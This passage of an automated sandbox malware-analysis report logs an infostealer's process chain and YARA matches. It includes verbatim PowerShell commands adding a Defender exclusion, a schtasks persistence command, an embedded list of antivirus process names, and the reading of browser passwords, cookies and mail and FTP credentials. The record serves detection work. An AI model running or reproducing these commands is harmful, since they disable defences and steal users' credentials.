                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /oJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /oJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe" Jump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 12:07 /du 23:59 /sc daily /ri 1 /fJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp692E.tmp.cmd""Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 6
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,4_2_02A05ACC
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: GetLocaleInfoA,4_2_02A0A7C4
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,4_2_02A05BD8
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: GetLocaleInfoA,4_2_02A0A810
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,26_2_02A95ACC
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,26_2_02A95BD7
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: GetLocaleInfoA,26_2_02A9A810
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Users\user\AppData\Local\Temp\neworigin.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Users\user\AppData\Local\Temp\neworigin.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Users\user\AppData\Local\Temp\neworigin.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02A0920C GetLocalTime,4_2_02A0920C
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02A0B78C GetVersionExA,4_2_02A0B78C
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: cmdagent.exe
                      Source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: quhlpsvc.exe
                      Source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgamsvr.exe
                      Source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
                      Source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Vsserv.exe
                      Source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgupsvc.exe
                      Source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgemc.exe
                      Source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 13.0.neworigin.exe.d90000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001C.00000002.2693859207.0000000002CC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.1691089667.00000000030C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.2693859207.0000000002CBC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.2692159904.000000000307C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.2693859207.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000000.1512401609.0000000000D92000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.2692159904.0000000003084000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.1691089667.00000000030D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.1691089667.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.2692159904.0000000003051000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: neworigin.exe PID: 4352, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: neworigin.exe PID: 7572, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\FTP Navigator\Ftplist.txt
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
